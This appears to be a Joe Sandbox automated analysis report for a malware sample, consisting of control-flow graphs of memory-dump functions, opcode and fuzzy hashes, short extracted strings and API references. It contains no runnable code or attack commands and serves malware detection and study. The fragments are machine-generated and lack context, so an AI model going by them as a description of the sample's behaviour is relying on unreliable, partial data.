                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: 289a10eb68ce5eeae68ef1c242469df5f8fd2843bd95c90afd699fbd11678694
                                                              • Instruction ID: 67c3fe80815a3d08cdfb0bc0e631efcbcef377eb0561955427db77bb842bc129
                                                              • Opcode Fuzzy Hash: 289a10eb68ce5eeae68ef1c242469df5f8fd2843bd95c90afd699fbd11678694
                                                              • Instruction Fuzzy Hash: AB81D374E00218CFEB14DFAAD884A9DBBF2BF88310F14C169E819AB365DB349945CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 436 168d278-168d2a8 437 168d2aa 436->437 438 168d2af-168d38c call 16841a0 call 1683cc0 436->438 437->438 448 168d38e 438->448 449 168d393-168d3b4 call 1685658 438->449 448->449 451 168d3b9-168d3c4 449->451 452 168d3cb-168d3cf 451->452 453 168d3c6 451->453 454 168d3d1-168d3d2 452->454 455 168d3d4-168d3db 452->455 453->452 456 168d3f3-168d437 454->456 457 168d3dd 455->457 458 168d3e2-168d3f0 455->458 462 168d49d-168d4b4 456->462 457->458 458->456 464 168d439-168d44f 462->464 465 168d4b6-168d4db 462->465 469 168d479 464->469 470 168d451-168d45d 464->470 471 168d4dd-168d4f2 465->471 472 168d4f3 465->472 475 168d47f-168d49c 469->475 473 168d45f-168d465 470->473 474 168d467-168d46d 470->474 471->472 476 168d477 473->476 474->476 475->462 476->475
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: bfaa236f9037da7c706a116645217486963a2823ed3afad20a14a29067eb3c4a
                                                              • Instruction ID: 4fa6e4ccbc1257deb4f8056e9bca593c831a56e2ed2ef466548c11ff30ef84f4
                                                              • Opcode Fuzzy Hash: bfaa236f9037da7c706a116645217486963a2823ed3afad20a14a29067eb3c4a
                                                              • Instruction Fuzzy Hash: 4B81D474E01218DFEB14DFAAD984A9DBBF2BF89300F14C169E419AB365DB349945CF20

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 392 168ccd8-168cd08 393 168cd0a 392->393 394 168cd0f-168cdec call 16841a0 call 1683cc0 392->394 393->394 404 168cdee 394->404 405 168cdf3-168ce14 call 1685658 394->405 404->405 407 168ce19-168ce24 405->407 408 168ce2b-168ce2f 407->408 409 168ce26 407->409 410 168ce31-168ce32 408->410 411 168ce34-168ce3b 408->411 409->408 412 168ce53-168ce97 410->412 413 168ce3d 411->413 414 168ce42-168ce50 411->414 418 168cefd-168cf14 412->418 413->414 414->412 420 168ce99-168ceaf 418->420 421 168cf16-168cf3b 418->421 425 168ced9 420->425 426 168ceb1-168cebd 420->426 427 168cf3d-168cf52 421->427 428 168cf53 421->428 431 168cedf-168cefc 425->431 429 168cebf-168cec5 426->429 430 168cec7-168cecd 426->430 427->428 432 168ced7 429->432 430->432 431->418 432->431
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: c421fa08227e69d0941a3f4621fd8ab242a48c488331e568952d906353c6cba8
                                                              • Instruction ID: 62f9338d03b0671ae8af9c04add9eb7d5944eb6f32aef3599cc5c0bb520c1ae5
                                                              • Opcode Fuzzy Hash: c421fa08227e69d0941a3f4621fd8ab242a48c488331e568952d906353c6cba8
                                                              • Instruction Fuzzy Hash: CC81C574E00218DFEB54DFAAD984A9DBBF2BF88300F14C169E419AB365DB349945CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 480 168cfab-168cfd8 481 168cfda 480->481 482 168cfdf-168d0bc call 16841a0 call 1683cc0 480->482 481->482 492 168d0be 482->492 493 168d0c3-168d0e4 call 1685658 482->493 492->493 495 168d0e9-168d0f4 493->495 496 168d0fb-168d0ff 495->496 497 168d0f6 495->497 498 168d101-168d102 496->498 499 168d104-168d10b 496->499 497->496 500 168d123-168d167 498->500 501 168d10d 499->501 502 168d112-168d120 499->502 506 168d1cd-168d1e4 500->506 501->502 502->500 508 168d169-168d17f 506->508 509 168d1e6-168d20b 506->509 513 168d1a9 508->513 514 168d181-168d18d 508->514 516 168d20d-168d222 509->516 517 168d223 509->517 515 168d1af-168d1cc 513->515 518 168d18f-168d195 514->518 519 168d197-168d19d 514->519 515->506 516->517 520 168d1a7 518->520 519->520 520->515
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                              • API String ID: 0-3801734409
                                                              • Opcode ID: 367f0807493ac6b001937c413d20ff35c8558a94556356e1a250d71c549de05d
                                                              • Instruction ID: e221b440d1e1d046b1fe1401445e53937637be6fc2e2ce72e41c904841ed2d45
                                                              • Opcode Fuzzy Hash: 367f0807493ac6b001937c413d20ff35c8558a94556356e1a250d71c549de05d
                                                              • Instruction Fuzzy Hash: 8281C474E00218CFEB54DFAAD984A9DBBF2BF88310F14C169E419AB365DB349945CF10

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 524 1687118-168713b 525 168713d-1687143 524->525 526 1687146-1687166 524->526 525->526 529 1687168 526->529 530 168716d-1687174 526->530 532 16874fc-1687505 529->532 531 1687176-1687181 530->531 533 168750d-1687519 531->533 534 1687187-168719a 531->534 539 168751b-1687521 533->539 540 1687583-1687585 533->540 537 168719c-16871aa 534->537 538 16871b0-16871cb 534->538 537->538 547 1687484-168748b 537->547 548 16871cd-16871d3 538->548 549 16871ef-16871f2 538->549 541 168758b-168759a 539->541 542 1687523-1687536 539->542 540->541 543 1687587-1687589 540->543 556 168759c-16875ab 541->556 557 16875e4 541->557 542->540 546 16875e9-16875eb 543->546 547->532 555 168748d-168748f 547->555 553 16871dc-16871df 548->553 554 16871d5 548->554 551 16871f8-16871fb 549->551 552 168734c-1687352 549->552 551->552 560 1687201-1687207 551->560 558 1687358-168735d 552->558 559 168743e-1687441 552->559 561 1687212-1687218 553->561 562 16871e1-16871e4 553->562 554->552 554->553 554->559 554->561 563 168749e-16874a4 555->563 564 1687491-1687496 555->564 556->557 580 16875ad-16875b3 556->580 557->546 558->559 567 1687508 559->567 568 1687447-168744d 559->568 560->552 566 168720d 560->566 569 168721a-168721c 561->569 570 168721e-1687220 561->570 571 16871ea 562->571 572 168727e-1687284 562->572 563->533 565 16874a6-16874ab 563->565 564->563 574 16874ad-16874b2 565->574 575 16874f0-16874f3 565->575 566->559 567->533 577 168744f-1687457 568->577 578 1687472-1687476 568->578 579 168722a-1687233 569->579 570->579 571->559 572->559 576 168728a-1687290 572->576 574->567 583 16874b4 574->583 575->567 590 16874f5-16874fa 575->590 584 1687292-1687294 576->584 585 1687296-1687298 576->585 577->533 586 168745d-168746c 577->586 578->547 589 1687478-168747e 578->589 587 1687235-1687240 579->587 588 1687246-168726e 579->588 581 16875b5 580->581 582 16875b7-16875c3 580->582 591 16875c5-16875de 581->591 582->591 592 16874bb-16874c0 583->592 593 16872a2-16872b9 584->593 585->593 586->538 586->578 587->559 587->588 615 1687362-1687398 588->615 616 1687274-1687279 588->616 589->531 589->547 590->532 590->555 591->557 613 16875e0-16875e2 591->613 595 16874e2-16874e4 592->595 596 16874c2-16874c4 592->596 606 16872bb-16872d4 593->606 607 16872e4-168730b 593->607 595->567 604 16874e6-16874e9 595->604 601 16874d3-16874d9 596->601 602 16874c6-16874cb 596->602 601->533 605 16874db-16874e0 601->605 602->601 604->575 605->595 610 16874b6-16874b9 605->610 606->615 619 16872da-16872df 606->619 607->567 621 1687311-1687314 607->621 610->567 610->592 613->546 622 168739a-168739e 615->622 623 16873a5-16873ad 615->623 616->615 619->615 621->567 624 168731a-1687343 621->624 625 16873bd-16873c1 622->625 626 16873a0-16873a3 622->626 623->567 627 16873b3-16873b8 623->627 624->615 639 1687345-168734a 624->639 628 16873e0-16873e4 625->628 629 16873c3-16873c9 625->629 626->623 626->625 627->559 632 16873ee-168740d call 16876f1 628->632 633 16873e6-16873ec 628->633 629->628 631 16873cb-16873d3 629->631 631->567 634 16873d9-16873de 631->634 636 1687413-1687417 632->636 633->632 633->636 634->559 636->559 637 1687419-1687435 636->637 637->559 639->615
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oq$(oq$,q$,q
                                                              • API String ID: 0-620556200
                                                              • Opcode ID: 58cde5bebd94ccce0098bb1af8a40cdc81f6ceac686e026fe18f63550182e9a4
                                                              • Instruction ID: 729577a9bfff8e459ee8bad71ae09f3cc784cfbdd1bd1da9ab79a16ff6f76cd6
                                                              • Opcode Fuzzy Hash: 58cde5bebd94ccce0098bb1af8a40cdc81f6ceac686e026fe18f63550182e9a4
                                                              • Instruction Fuzzy Hash: 8DF12C30A01119CFDB15DF69CC84AADBBF2BF48314F698169E905AB365DB30ED41CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oq$4'q
                                                              • API String ID: 0-1336004174
                                                              • Opcode ID: 5f248f9bed055ffc5f0a1a8de556ed40f12edbd4a88095ea700052cc8d1c87cb
                                                              • Instruction ID: 40f468cea3ce985395624178d305e141e5bdb030a31670598ab9434f4d8a6107
                                                              • Opcode Fuzzy Hash: 5f248f9bed055ffc5f0a1a8de556ed40f12edbd4a88095ea700052cc8d1c87cb
                                                              • Instruction Fuzzy Hash: E7827F71A00209DFCB15DFA8C984AAEBBF2FF88310F15865AE9059B365D730ED91CB51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2136 6df9548-6df9577 2137 6df957e-6df9614 LdrInitializeThunk 2136->2137 2138 6df9579 2136->2138 2139 6df96b3-6df96b9 2137->2139 2138->2137 2140 6df96bf-6df96d7 2139->2140 2141 6df9619-6df962c 2139->2141 2142 6df96eb-6df96fe 2140->2142 2143 6df96d9-6df96e6 2140->2143 2144 6df962e 2141->2144 2145 6df9633-6df9684 2141->2145 2147 6df9705-6df9721 2142->2147 2148 6df9700 2142->2148 2146 6df9a81-6df9b7e 2143->2146 2144->2145 2162 6df9697-6df96a9 2145->2162 2163 6df9686-6df9694 2145->2163 2153 6df9b86-6df9b90 2146->2153 2154 6df9b80-6df9b85 2146->2154 2150 6df9728-6df974c 2147->2150 2151 6df9723 2147->2151 2148->2147 2157 6df974e 2150->2157 2158 6df9753-6df9785 2150->2158 2151->2150 2154->2153 2157->2158 2167 6df978c-6df97ce 2158->2167 2168 6df9787 2158->2168 2164 6df96ab 2162->2164 2165 6df96b0 2162->2165 2163->2140 2164->2165 2165->2139 2170 6df97d5-6df97de 2167->2170 2171 6df97d0 2167->2171 2168->2167 2172 6df9a06-6df9a0c 2170->2172 2171->2170 2173 6df97e3-6df9808 2172->2173 2174 6df9a12-6df9a25 2172->2174 2175 6df980f-6df9846 2173->2175 2176 6df980a 2173->2176 2177 6df9a2c-6df9a47 2174->2177 2178 6df9a27 2174->2178 2186 6df984d-6df987f 2175->2186 2187 6df9848 2175->2187 2176->2175 2179 6df9a4e-6df9a62 2177->2179 2180 6df9a49 2177->2180 2178->2177 2184 6df9a69-6df9a7f LdrInitializeThunk 2179->2184 2185 6df9a64 2179->2185 2180->2179 2184->2146 2185->2184 2189 6df98e3-6df98f6 2186->2189 2190 6df9881-6df98a6 2186->2190 2187->2186 2191 6df98fd-6df9922 2189->2191 2192 6df98f8 2189->2192 2193 6df98ad-6df98db 2190->2193 2194 6df98a8 2190->2194 2197 6df9924-6df9925 2191->2197 2198 6df9931-6df9969 2191->2198 2192->2191 2193->2189 2194->2193 2197->2174 2199 6df996b 2198->2199 2200 6df9970-6df99d1 call 6df9328 2198->2200 2199->2200 2206 6df99d8-6df99fc 2200->2206 2207 6df99d3 2200->2207 2210 6df99fe 2206->2210 2211 6df9a03 2206->2211 2207->2206 2210->2211 2211->2172
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f22d487691f64f7eb5e15ba884c8ddfbaa519e670c2eb0bbe38e9f6821866489
                                                              • Instruction ID: c826e0cade3ae3ef6fa1479d26d0e9bbc721436e29295d5f1e7a6372569121f9
                                                              • Opcode Fuzzy Hash: f22d487691f64f7eb5e15ba884c8ddfbaa519e670c2eb0bbe38e9f6821866489
                                                              • Instruction Fuzzy Hash: E7F1F374E10218CFDB54DFA9C884B9DBBF2BF88304F1581A9D948AB355DB709986CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oq$Hq
                                                              • API String ID: 0-2917151738
                                                              • Opcode ID: e13ab3a82a275848bc05b9a5bfc2a81402c1ef354877acefdd7036f405d8b7d6
                                                              • Instruction ID: 4613f83b5dc4a99ae6403f38a822509361a6512b2a81516f7ad5f5d5621bca93
                                                              • Opcode Fuzzy Hash: e13ab3a82a275848bc05b9a5bfc2a81402c1ef354877acefdd7036f405d8b7d6
                                                              • Instruction Fuzzy Hash: 51128D70A002199FDB15EF69CC54BAEBBF6BFC8300F648529E9069B355DB309D42CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xq$$q
                                                              • API String ID: 0-855381642
                                                              • Opcode ID: 1d09a0ba38b0c4ed96989e4fc5a82a3ed7e00707a16fdda25aecaca31d671e47
                                                              • Instruction ID: 911e014dcd65006809594c8dd679a2c91adae07afbde1d3fc847f686b5bf09f7
                                                              • Opcode Fuzzy Hash: 1d09a0ba38b0c4ed96989e4fc5a82a3ed7e00707a16fdda25aecaca31d671e47
                                                              • Instruction Fuzzy Hash: 36F14E74E04319DFDB18EFB9D8546AEBBB2BF88300B158569E406AB354DF359C02CB51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1f1fa7eb3407529db05b23b8f950573c99fce9270432034cb36de02ca26dcee3
                                                              • Instruction ID: f940de69dd9db7e09163775df5a84ba743c959ca2e3c1004cc84c8a6e5e70bd0
                                                              • Opcode Fuzzy Hash: 1f1fa7eb3407529db05b23b8f950573c99fce9270432034cb36de02ca26dcee3
                                                              • Instruction Fuzzy Hash: 6F3109B1D016189BEB18CFAAD9847DDFBF2BF88314F14C26AE418AB294DB704545CF50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bcdafe5210eba15470a38721d5026cb08f824cece9e12a0b53608c3e30ef494
                                                              • Instruction ID: 1f912fd6ce805225daf2fee635abb925cc85b48e403c8fffd533ef5b5132e57e
                                                              • Opcode Fuzzy Hash: 4bcdafe5210eba15470a38721d5026cb08f824cece9e12a0b53608c3e30ef494
                                                              • Instruction Fuzzy Hash: A572CC74E01229CFDBA4DF69C984BEDBBB2BB49300F1581E9D548AB251DB349E81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96af8a087feff3b52c469ffbf513544ac72f32c91b72be73b73b4f8ec6f08864
                                                              • Instruction ID: 7a7240d95278ddc25459ad7654a8f59a667672ac585e95ad271b13f33a3617ab
                                                              • Opcode Fuzzy Hash: 96af8a087feff3b52c469ffbf513544ac72f32c91b72be73b73b4f8ec6f08864
                                                              • Instruction Fuzzy Hash: 4DC18E78E00218CFDB54DFA9D954B9DBBB2BF89300F1081A9D809AB365DB359E85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c8c543e45c0f00881a3cf4adc007f2c7875be7635ade20c2ab658f2b12fb10e
                                                              • Instruction ID: c819115f6dcd7c64f732e376b125f12067fcfbd44aac5ea68aaad324809d38d7
                                                              • Opcode Fuzzy Hash: 3c8c543e45c0f00881a3cf4adc007f2c7875be7635ade20c2ab658f2b12fb10e
                                                              • Instruction Fuzzy Hash: 43A11574D00208CFEB14DFA9C948BDDBBB1FF88310F208269E509AB291DB749A85CF55
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7872d80fd6018b16eb19d982ed32f6d1cb749007db31c7470770f40e8c66cf32
                                                              • Instruction ID: dd0151c9414b245d82d181201140864ce5dfe30a5b3285cc24f23ca67544f43a
                                                              • Opcode Fuzzy Hash: 7872d80fd6018b16eb19d982ed32f6d1cb749007db31c7470770f40e8c66cf32
                                                              • Instruction Fuzzy Hash: 60A10574D00208CFEB14DFA9C948BDDBBB1FF89310F248269E509AB291DB749985CF54
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3726947315.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_6df0000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a3fbce4ab204357a4212cc7e9f36e7a9648cd8e8bae092b8195c38fad951e83
                                                              • Instruction ID: a7fae075c48a9390c17de6d9a10bc57a479dae55cbba55712d7e18e210bcd582
                                                              • Opcode Fuzzy Hash: 3a3fbce4ab204357a4212cc7e9f36e7a9648cd8e8bae092b8195c38fad951e83
                                                              • Instruction Fuzzy Hash: 0C911374D10208CFEB50DFA8C888BDCBBB1FF49310F219269E509AB291DB719A85CF54
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0bc18e83e178d94827df2450315a075b6da440cc8a3e7f8cb8783dc86c047f26
                                                              • Instruction ID: 708798678918f5eac8ec55c1ed32575f883aca0ddd6da74ded4e0d6ff1a552b7
                                                              • Opcode Fuzzy Hash: 0bc18e83e178d94827df2450315a075b6da440cc8a3e7f8cb8783dc86c047f26
                                                              • Instruction Fuzzy Hash: 58518774E00308DFEB18DFAAD994A9DBBB2FF89310F249129E815AB364DB355841CF54
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80814157898b3f3ea8d09aade3e3fc4dc70a06b9f4a053660d7edb86418cf2ca
                                                              • Instruction ID: c34a3e880a7dac3ad6be137141f30c44795f149c832f86b515e9a819cc809b41
                                                              • Opcode Fuzzy Hash: 80814157898b3f3ea8d09aade3e3fc4dc70a06b9f4a053660d7edb86418cf2ca
                                                              • Instruction Fuzzy Hash: BE519674E00208DFEB18DFAAD994A9DBBB2FF89310F249129E815AB364DB355841CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 16876f1-1687725 1 168772b-168774e 0->1 2 1687b54-1687b58 0->2 11 16877fc-1687800 1->11 12 1687754-1687761 1->12 3 1687b5a-1687b6e 2->3 4 1687b71-1687b7f 2->4 8 1687bf0-1687c05 4->8 9 1687b81-1687b96 4->9 18 1687c0c-1687c19 8->18 19 1687c07-1687c0a 8->19 20 1687b98-1687b9b 9->20 21 1687b9d-1687baa 9->21 15 1687848-1687851 11->15 16 1687802-1687810 11->16 24 1687770 12->24 25 1687763-168776e 12->25 22 1687c67 15->22 23 1687857-1687861 15->23 16->15 36 1687812-168782d 16->36 26 1687c1b-1687c56 18->26 19->26 27 1687bac-1687bed 20->27 21->27 30 1687c6c-1687c9c 22->30 23->2 28 1687867-1687870 23->28 31 1687772-1687774 24->31 25->31 75 1687c5d-1687c64 26->75 34 168787f-168788b 28->34 35 1687872-1687877 28->35 63 1687c9e-1687cb4 30->63 64 1687cb5-1687cbc 30->64 31->11 38 168777a-16877dc 31->38 34->30 41 1687891-1687897 34->41 35->34 55 168783b 36->55 56 168782f-1687839 36->56 87 16877de 38->87 88 16877e2-16877f9 38->88 43 168789d-16878ad 41->43 44 1687b3e-1687b42 41->44 53 16878af-16878bf 43->53 54 16878c1-16878c3 43->54 44->22 48 1687b48-1687b4e 44->48 48->2 48->28 61 16878c6-16878cc 53->61 54->61 62 168783d-168783f 55->62 56->62 61->44 67 16878d2-16878e1 61->67 62->15 68 1687841 62->68 72 168798f-16879ba call 1687538 * 2 67->72 73 16878e7 67->73 68->15 91 16879c0-16879c4 72->91 92 1687aa4-1687abe 72->92 77 16878ea-16878fb 73->77 77->30 80 1687901-1687913 77->80 80->30 83 1687919-1687931 80->83 145 1687933 call 16880d8 83->145 146 1687933 call 1687fe4 83->146 147 1687933 call 1687fa4 83->147 148 1687933 call 1688055 83->148 86 1687939-1687949 86->44 90 168794f-1687952 86->90 87->88 88->11 93 168795c-168795f 90->93 94 1687954-168795a 90->94 91->44 96 16879ca-16879ce 91->96 92->2 118 1687ac4-1687ac8 92->118 93->22 97 1687965-1687968 93->97 94->93 94->97 101 16879d0-16879dd 96->101 102 16879f6-16879fc 96->102 98 168796a-168796e 97->98 99 1687970-1687973 97->99 98->99 103 1687979-168797d 98->103 99->22 99->103 114 16879ec 101->114 115 16879df-16879ea 101->115 104 16879fe-1687a02 102->104 105 1687a37-1687a3d 102->105 103->22 106 1687983-1687989 103->106 104->105 107 1687a04-1687a0d 104->107 108 1687a49-1687a4f 105->108 109 1687a3f-1687a43 105->109 106->72 106->77 116 1687a1c-1687a32 107->116 117 1687a0f-1687a14 107->117 112 1687a5b-1687a5d 108->112 113 1687a51-1687a55 108->113 109->75 109->108 121 1687a5f-1687a68 112->121 122 1687a92-1687a94 112->122 113->44 113->112 123 16879ee-16879f0 114->123 115->123 116->44 117->116 119 1687aca-1687ad4 call 16863e0 118->119 120 1687b04-1687b08 118->120 119->120 133 1687ad6-1687aeb 119->133 120->75 130 1687b0e-1687b12 120->130 126 1687a6a-1687a6f 121->126 127 1687a77-1687a8d 121->127 122->44 128 1687a9a-1687aa1 122->128 123->44 123->102 126->127 127->44 130->75 132 1687b18-1687b25 130->132 136 1687b34 132->136 137 1687b27-1687b32 132->137 133->120 142 1687aed-1687b02 133->142 139 1687b36-1687b38 136->139 137->139 139->44 139->75 142->2 142->120 145->86 146->86 147->86 148->86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                              • API String ID: 0-2212926057
                                                              • Opcode ID: dfc6b199e796c526e563590dad594800a43880a211cced26c878e4c5c754ea8e
                                                              • Instruction ID: 7be3ab4c76ce84c75f3c975cc1f4e65783c6806c91b9f334bf80d4f289a380a6
                                                              • Opcode Fuzzy Hash: dfc6b199e796c526e563590dad594800a43880a211cced26c878e4c5c754ea8e
                                                              • Instruction Fuzzy Hash: 66125B30A00209DFDB25EF68D984AAEBBF2FF88314F248659E9559B361D730ED41CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 641 16829ec-16829f6 643 16829f8-1682a01 641->643 644 1682981-168298a 641->644 645 1682990-1682999 643->645 646 1682a03-1682a3b 643->646 644->645 651 16829a0-16829c8 645->651 649 1682a5d-1682aac 646->649 650 1682a3d-1682a5c 646->650 656 1682aae-1682ab5 649->656 657 1682ac7-1682acf 649->657 658 1682abe-1682ac5 656->658 659 1682ab7-1682abc 656->659 660 1682ad2-1682ae6 657->660 658->660 659->660 663 1682ae8-1682aef 660->663 664 1682afc-1682b04 660->664 665 1682af1-1682af3 663->665 666 1682af5-1682afa 663->666 667 1682b06-1682b0a 664->667 665->667 666->667 669 1682b6a-1682b6d 667->669 670 1682b0c-1682b21 667->670 671 1682b6f-1682b84 669->671 672 1682bb5-1682bbb 669->672 670->669 676 1682b23-1682b26 670->676 671->672 679 1682b86-1682b8a 671->679 674 1682bc1-1682bc3 672->674 675 16836b6 672->675 674->675 677 1682bc9-1682bce 674->677 682 16836bb-16836f0 675->682 680 1682b28-1682b2a 676->680 681 1682b45-1682b63 call 16802c8 676->681 683 1683664-1683668 677->683 684 1682bd4 677->684 685 1682b8c-1682b90 679->685 686 1682b92-1682bb0 call 16802c8 679->686 680->681 687 1682b2c-1682b2f 680->687 681->669 702 168371f-1683881 682->702 703 16836f2-168371a 682->703 689 168366a-168366d 683->689 690 168366f-16836b5 683->690 684->683 685->672 685->686 686->672 687->669 692 1682b31-1682b43 687->692 689->682 689->690 692->669 692->681 703->702
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.3719904859.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_1680000_VbcXXnmIwPPhh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xq$Xq$Xq$Xq
                                                              • API String ID: 0-3965792415
                                                              • Opcode ID: c11bad8144507c6b68d066c63f4b7da34ec46e1ed3bdafc825b829d6a8a83f06
                                                              • Instruction ID: 265e5b9e05d7023cafff555281b969e26547d307f0346982665f7a4ba00fd01a
                                                              • Opcode Fuzzy Hash: c11bad8144507c6b68d066c63f4b7da34ec46e1ed3bdafc825b829d6a8a83f06
                                                              • Instruction Fuzzy Hash: BCA14571D003298FDF61AFA88C947AEBBB1FF84314F54466ED445A7345EB318942CB92
                                                              Strings
